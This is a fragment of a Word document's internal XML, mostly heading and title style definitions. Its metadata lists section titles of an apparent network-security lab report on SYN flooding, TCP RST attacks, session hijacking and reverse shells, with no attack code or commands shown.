      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="SimSun" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:caps/>
      <w:color w:val="FFFFFF"/>
      <w:spacing w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003054D9"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="24" w:space="0" w:color="DEEAF6"/>
        <w:left w:val="single" w:sz="24" w:space="0" w:color="DEEAF6"/>
        <w:bottom w:val="single" w:sz="24" w:space="0" w:color="DEEAF6"/>
        <w:right w:val="single" w:sz="24" w:space="0" w:color="DEEAF6"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
      <w:spacing w:after="240"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:caps/>
      <w:spacing w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00376D00"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="6" w:space="1" w:color="5B9BD5"/>
      </w:pBdr>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="SimSun" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:caps/>
      <w:color w:val="1F4D78"/>
      <w:spacing w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Heading3"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D73B74"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="6" w:space="1" w:color="5B9BD5"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:pBdr>
      <w:spacing w:before="240" w:after="120"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading5Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00A83755"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="6" w:space="1" w:color="5B9BD5"/>
      </w:pBdr>
      <w:spacing w:before="120" w:after="80"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="SimSun" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:caps/>
      <w:color w:val="2E74B5"/>
      <w:spacing w:val="10"/>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading6Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00C75EEE"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="dotted" w:sz="6" w:space="1" w:color="4F81BD" w:themeColor="accent1"/>
      </w:pBdr>
      <w:spacing w:before="200"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:caps/>
      <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="1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semiHidden/>
    <w:rsid w:val="00C75EEE"/>
    <w:rPr>
      <w:caps/>
      <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="10"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D73B74"/>
    <w:rPr>
      <w:rFonts w:eastAsia="SimSun"/>
      <w:caps/>
      <w:color w:val="1F4D78"/>
      <w:spacing w:val="15"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00F90C08"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="thickThinSmallGap" w:sz="24" w:space="1" w:color="4F81BD" w:themeColor="accent1"/>
      </w:pBdr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="SimSun" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:caps/>
      <w:color w:val="5B9BD5"/>
      <w:spacing w:val="10"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="00F90C08"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="SimSun" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:caps/>
      <w:color w:val="5B9BD5"/>
      <w:spacing w:val="10"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00F90C08"/>
    <w:rPr>
      <w:rFonts w:eastAsia="SimSun"/>
      <w:caps/>
      <w:color w:val="FFFFFF"/>
      <w:spacing w:val="15"/>
      <w:shd w:val="clear" w:color="auto" w:fill="5B9BD5"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00376D00"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="SimSun" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:caps/>
      <w:color w:val="1F4D78"/>
      <w:spacing w:val="15"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00A83755"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="SimSun" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:caps/>
      <w:color w:val="2E74B5"/>
      <w:spacing w:val="10"/>
      <w:sz w:val="18"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00C75EEE"/>
    <w:pPr>
      <w:spacing w:before="100"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="SubtitleChar"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="002434F9"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="24" w:space="1" w:color="FFFF00"/>
        <w:left w:val="single" w:sz="24" w:space="4" w:color="FFFF00"/>
        <w:bottom w:val="single" w:sz="24" w:space="1" w:color="FFFF00"/>
        <w:right w:val="single" w:sz="24" w:space="4" w:color="FFFF00"/>
      </w:pBdr>
      <w:shd w:val="pct25" w:color="auto" w:fill="FF0000"/>
      <w:spacing w:after="500"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:caps/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:spacing w:val="10"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="21"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SubtitleChar">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Subtitle"/>
    <w:uiPriority w:val="11"/>
    <w:rsid w:val="002434F9"/>
    <w:rPr>
      <w:b/>
      <w:caps/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:spacing w:val="10"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="21"/>
      <w:u w:val="single"/>
      <w:shd w:val="pct25" w:color="auto" w:fill="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="003054D9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:caps/>
      <w:spacing w:val="15"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00A83755"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle01">
    <w:name w:val="fontstyle01"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="003054D9"/>
    <w:rPr>
      <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi" w:hint="default"/>
      <w:b/>
      <w:bCs/>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9315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908</TotalTime>
  <Pages>11</Pages>
  <Words>636</Words>
  <Characters>3627</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>30</Lines>
  <Paragraphs>8</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        Elia Rabia</vt:lpstr>
      <vt:lpstr>Task 1: SYN Flooding Attack</vt:lpstr>
      <vt:lpstr>Task 2: TCP RST Attacks on telnet and ssh Connections</vt:lpstr>
      <vt:lpstr>    Telnet Connection</vt:lpstr>
      <vt:lpstr>    SSH Connection</vt:lpstr>
      <vt:lpstr>    Using Scapy</vt:lpstr>
      <vt:lpstr>        telnet connection</vt:lpstr>
      <vt:lpstr>        ssh connection</vt:lpstr>
      <vt:lpstr>Task 4: TCP Session Hijacking</vt:lpstr>
      <vt:lpstr>        Using Scapy</vt:lpstr>
      <vt:lpstr>Task 5: Creating Reverse Shell using TCP Session Hijacking</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4255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elia rabia</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Elia Harel</cp:lastModifiedBy>
  <cp:revision>33</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-10-23T04:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-12-30T13:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>